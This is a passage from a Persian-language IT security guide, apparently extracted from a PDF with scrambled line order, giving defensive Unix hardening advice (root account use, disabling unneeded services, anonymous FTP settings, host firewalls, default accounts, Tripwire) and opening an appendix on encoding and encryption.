ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻣﻄﺎﻟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ .ﻧـﺎﻡ ﭼﻨـﺪﻳﻦ
ﻛﺘﺎﺏ ،ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ ،ﻭ ﮔﺮﻭﻩ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻣﻔﻴﺪ ﻛﻪ ﺑﻪ ﺍﻣﻨﻴـﺖ Unixﺍﺧﺘـﺼﺎﺹ ﺩﺍﺭﻧـﺪ ﺩﺭ ﺑﺨـﺶ
ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ.
ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﺘﻤﹰﺎ ﺑﺎﻳـﺪ ﺑـﻪﺭﻭﺯ ﮔـﺮﺩﺩﻭ ﺗﻤـﺎﻣﻲ ﻭﺻـﻠﻪﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺳﺮﻳﻌﹰﺎ ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﺷﻮﻧﺪ .ﺟﺰﺋﻴﺎﺕ ﺍﻳﻨﻜﻪ ﺑﺴﺘﺔ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳـﺪ ﺗﻬﻴـﻪ ﻛـﺮﺩ ﻭ ﭼﮕﻮﻧـﻪ ﺁﻧـﺮﺍ
ﺍﻋﻤﺎﻝ ﻧﻤﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ.
126 Pre-Installed Security Mechanisms
١٠٣
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﺍﮔﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻛﺎﺭﺑﺮ ﺩﺍﺭﻳﺪ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ
ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ١٢٨ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ
ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎ ﻳﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ
ﻏﻴــﺮ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻫﻴﭽﮕﺎﻩ ﺑﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎﺯ ﻭ
ﻻ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛـﻪ ﺑـﺎ
ﻳﺎ ﻛﺎﻣﭙﺎﻳﻞ ﻧﻜﻨﻴﺪ .ﻣﻌﻤﻮ ﹰ
chrootﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺷﻮﻳﺪ ﻛﺎﻣﭙﺎﻳﻞ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺍﺯ ﺷـﻤﺎ
ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺗﺮﻭﺍﻫﺎ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻨﺪ.
ﻧﺼﺐ ﺩﻳﺴﻜﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻣﻲﮔﻴﺮﻧﺪ
ﺍﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺩﻳـﺴﻚ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ
ﻣﺨﺘﻠﻒ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﻳـﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ (UNIXﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ
ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻣﻨﺎﺳــﺒﻲ ﺗﻌﻴــﻴﻦ ﻭ ﺩﺭﺻــﻮﺭﺕ ﺍﻣﻜــﺎﻥ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻣﻨﺪﻧﺪ ﺭﺍ
ﺗﻨﻬﺎ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﺓ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
127 Root User
128 Access Control List
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ inetd
ﻳــﺎ xinetdﺷــﺮﻭﻉ ﺑــﻪ ﻓﻌﺎﻟﻴــﺖ ﻣــﻲﻛﻨﻨــﺪ .ﻓﺎﻳﻠﻬــﺎﻱ
ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻪ ﺗﻮﺳﻂ ﺍﻳﻦ daemonﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ
ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻻﺯﻡ
ﻧﺪﺍﺭﻳﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺧﺪﻣﺎﺕ ﺷـﺒﻜﻪﺍﻱ ﺩﻳﮕـﺮ ﻛـﻪ
ﻫﻨﮕﺎﻡ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﻴﺴﺘﻢ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣـﻲﻛﻨﻨـﺪ ﺩﺭ
ﻓﺎﻳﻠﻬــﺎﻳﻲ ﺩﺭ ﻣــﺴﻴﺮ /etc/init.dﻳــﺎ /etc/rc*.dﻭ ﻳــﺎ
/etc/rcﻭ /etc/rc.localﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ .ﺑـﻪ ﺧـﺪﻣﺎﺗﻲ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﺎﺭﺑﺮ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ
ﺩﻳﮕﺮﺍﻥ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ -ﻣﺜـﻞ - fingerdﺗﻮﺟـﻪ ﻭﻳـﮋﻩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺍﮔﺮ ﺳﺮﻭﻳﺲ FTPﻧﺎﺷﻨﺎﺱ ١٢٩ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﻧﻤـﻮﺩﻩ ﺍﻳـﺪ
ﺣﺘﻤــﹰﺎ ﺁﻧـــﺮﺍ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻧﻤﺎﻳﻴـــﺪ .ﻫﺮﮔـــﺰ ﻓﺎﻳـــﻞ
/etc/passwdﺭﺍ ﺩﺭ ﻣﺤــﻴﻂ FTPﺗﺒــﺎﺩﻝ ﻧﻜﻨﻴــﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ bin ،uucp ،rootﻭ
ﺩﻳﮕﺮ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﺎﺻﻲ ﻗﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ
ﺩﺭ ﻓﺎﻳــﻞ - /etc/ftpusersﻛــﻪ ﺷــﺎﻣﻞ ﻓﻬﺮﺳــﺖ
ﻛﺎﺭﺑﺮﺍﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ FTPﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ -
ﻭﺟــﻮﺩ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ .ﻣﺮﺍﻗــﺐ ﻣﺠــﻮﺯ ﺩﺳﺘﺮﺳــﻲ ﺑــﻪ
ﺷﺎﺧﻪﻫﺎ ١٣٠ﻭ ﻣﺎﻟﻜﻴﺖ ١٣١ﺁﻧﻬﺎ ﺩﺭ ﻣﺤﻴﻂ FTPﺑﺎﺷﻴﺪ .ﺍﺯ
ﺍﻧﺠﺎﻡ downloadﺗﻮﺳﻂ ﻣـﺴﻴﺮﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻭ ﺍﻧﺠـﺎﻡ
129 Anonymous FTP
130 Directory Permission
131 Ownership
ﺑﺨﺶ ﺩﻭﻡ
ﻛﺎﺭﺑﺮ ﺭﻳﺸﻪ (uid 0) ١٢٧ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺩﺍﺭﺩ
ﻻ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻣﻲ ﺍﺑﻌﺎﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺑـﺮ
ﻭ ﻣﻌﻤﻮ ﹰ
ﻫﻤــﻴﻦ ﺍﺳــﺎﺱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﻭ
ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﻛﻪ ﺍﺟﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻳﻦ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ
ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺖ UNIXﺑـﺸﻤﺎﺭ
ﻣــﻲﺭﻭﺩ .ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺩﺭ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﺧـﻮﺩﺩﺍﺭﻱ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻃﻤﻴﻨـﺎﻥ
ﺑﻴﺸﺘﺮ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺏ
ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺍﺯ ﺩﺳـﺘﻮﺭ superuser
) suﻳﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ (sudoﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺣـﺴﺎﺏ
ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﺗﺒﺪﻳﻞ
ﻧﻤﺎﻳﻴﺪ.
ﺑـــﺴﻴﺎﺭﻱ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ UNIXﺩﺍﺭﺍﻱ ﺧـــﺪﻣﺎﺕ
ﺳﻴــﺴﺘﻤﻲ ﮔــﺴﺘﺮﺩﻩﺍﻱ ﻫــﺴﺘﻨﺪ ،ﻣﺜــﻞ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ
،FTPﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﻭﺏ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﭘــﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺑـﺼﻮﺭﺕ
ﭘﻴﺶﻓﺮﺽ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ .ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ
ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤـﻲ ﮔﻴﺮﻧـﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﺳـﺎﺯﻳﺪ.
ﺑﻌﻀﻲ ﻣﺮﺩﻡ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﭼـﻮﻥ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﻭﺟـﻮﺩ
ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤـﻮﺩ -ﺣﺘـﻲ ﺍﮔـﺮ ﺗﺨـﺼﺺ
ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ
ﺑﺰﺭﮔﻲ ﺍﺳﺖ ﻭ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﺒﺎﻳﺪ ﺑﺪﻭﻥ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨـﺪﻩ
ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮﺍﻥ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪﻩ ﺑﺎﺷﻨﺪ.
١٠٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
uploadﺑﻮﺳﻴﻠﻪ ﻣﺴﻴﺮﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ،
ﻭ ﺑﺎﻻﺧﺮﻩ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺛﺒﺘﻬﺎﻱ ﺳـﺮﻭﻳﺲ FTPﺧـﻮﺩ ﺭﺍ
ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻫــﺮ ﺳﻴــﺴﺘﻢ UNIXﺑﺎﻳــﺪ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﻣﺒﺘﻨــﻲ ﺑــﺮ
ﻣﻴﺰﺑﺎﻥ ١٣٢ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗـﺼﻔﻴﺔ ﺑـﺴﺘﻪﻫـﺎ
١٣٣
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﺪ .ﺍﺯ ﻣﺴﺘﻨﺪﺍﺕ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ
ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺍﺭﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ ،ﻭ ﺍﮔﺮ ﻫﺴﺖ ﭼﮕﻮﻧﻪ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ
ﻻ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ
ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺷــﺎﻣﻞ ipchains ،ipfwﻭ iptables
ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜـﺮﺑﻨـﺪﻱ
ﺷﻮﻧﺪ ﻛﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺭﺍﻩ ﻋﺒﻮﺭ ﺗﻤـﺎﻣﻲ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ
ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺗﻨﻬﺎ ﺑﻪ ﺁﻧﻬﺎﻳﻲ ﻣﺠـﻮﺯ ﻋﺒـﻮﺭ ﺩﻫﻨـﺪ ﻛـﻪ
ﻣﻘﺼﺪ ﺁﻧﻬﺎ ﺧﺪﻣﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪﺍﻳﺪ.
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓﺮﺽ
ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ Unixﺩﺍﺭﺍﻱ ﭼﻨــﺪﻳﻦ ﺣــﺴﺎﺏ
ﻛــﺎﺭﺑﺮﻱ ﭘــﻴﺶﻓــﺮﺽ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ
ﺟﺪﺍﮔﺎﻧﻪ ﻳﺎ ﻣﺠﻮﺯ ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻠﻬﺎ ﻣﺎﻧﻨﺪ daemon ،bin
ﻭ uucpﻭ ﻏﻴﺮﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﺍﻃﻤﻴﻨـﺎﻥ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﺓ
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﺬﻛﻮﺭ ﺑﺎ ﻋﻼﻣﺖ "*" ﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ
ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑـﺎ ﻫـﻴﭻ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻧﻤـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ .ﻫﻤﻴﻨﻜـﻪ ﺣـﺴﺎﺏ
ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛﻔﺎﻳـﺖ
ﻣﻲﻛﻨـﺪ؛ ﻭ ﻻﺯﻡ ﻧﻴـﺴﺖ ﻛـﺴﻲ ﺑﺘﻮﺍﻧـﺪ ﻭﺍﺭﺩ ﺣـﺴﺎﺑﻬﺎﻱ
ﻛﺎﺭﺑﺮﻱ ﺩﻳﮕﺮ ﮔﺮﺩﺩ )ﺍﮔﺮﭼﻪ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ
ﺭﻳﺸﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ suﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺴﺎﺑﻬﺎﻱ ﺩﻳﮕﺮ
ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ(.
ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻧﺪﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ
ﺑﻪ ﺭﺍﻫﺒﺮ Unixﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲ ﺗـﺮﻳﻦ ﺁﻧﻬـﺎ
Tripwireﺍﺳﺖ ﻛﻪ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﻢ
132 Host-Based Firewall
133 Packet-Filtering
ﺳﻴﺴﺘﻢ ﻭ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ
ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ.
١٠٥
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺿﻤﻴﻤﺔ ۱
ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ
ﻓﺮﺁﻳﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ
ﻓﺮﺽ ﻛﻨﻴﺪ ﻣﻲ ﺧﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ
ﺟﻤﻠﺔ ﻋﺎﺩﻱ ﺍﻧﮕﻠﻴﺴﻲ ﺍﺳﺖ:
Security is important.
ﺍﻣﺎ ﺩﺭ ﺍﺭﺳﺎﻝ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ
ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﻗﺎﻡ ﺩﻫﺪﻫﻲ ﺭﺍ ﺍﺭﺳﺎﻝ ﻛﻨﻴـﺪ،۵ ،۴ ،۳ ،۲ ،۱ ،۰ :
.۹ ،۸ ،۷ ،۶ﭘﺲ ﺑﺎﻳﺪ ﻳﻚ ﺗﺎﺑﻊ ﻧﮕﺎﺷﺖ ﺗﻬﻴﻪ ﻛﻨـﻴﻢ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ
ﺁﻧﭽﻪ ﻣﻲﺧﻮﺍﻫﻴﻢ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ ﺭﺍ ﺑﻪ ﺍﻋﺪﺍﺩ ﺩﻫﺪﻫﻲ ﺗﺒﺪﻳﻞ ﻛﻨـﺪ،
ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺭﺳﺎﻝ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﻣﺠـﺪﺩﹰﺍ ﺑـﻪ ﺣﺎﻟـﺖ ﻗﺒﻠـﻲ ﺧـﻮﺩ
ﺑﺎﺯﮔﺮﺩﺍﻧﺪ.
ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ:
ﺑﺠﺎﻱ C
ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﻛﺪ ﺗﻌﻴﻴﻦ ﺷـﺪﻩ،
ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻴﺪ.
۱۹ﺭﺍ ﺑﺠﺎﻱ Sﻗﺮﺍﺭ ﺩﻫﻴﺪ؛
۰۵ﺭﺍ ﺑﺠﺎﻱ Eﻗﺮﺍﺭ ﺩﻫﻴﺪ؛
۰۳ﺭﺍ ﺑﺠﺎﻱ Cﻗﺮﺍﺭ ﺩﻫﻴﺪ؛ ﻭ ...
19050321180920252709192709131615182001142028
ﻛﺪﮔﺬﺍﺭﻱ ﻗﺎﻟﺐ ﻣﻮﺿﻮﻉ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺮﺧﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ
ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ .ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑﺮﮔـﺸﺖ ﭘـﺬﻳﺮ ﺍﺳـﺖ؛
١٣٦
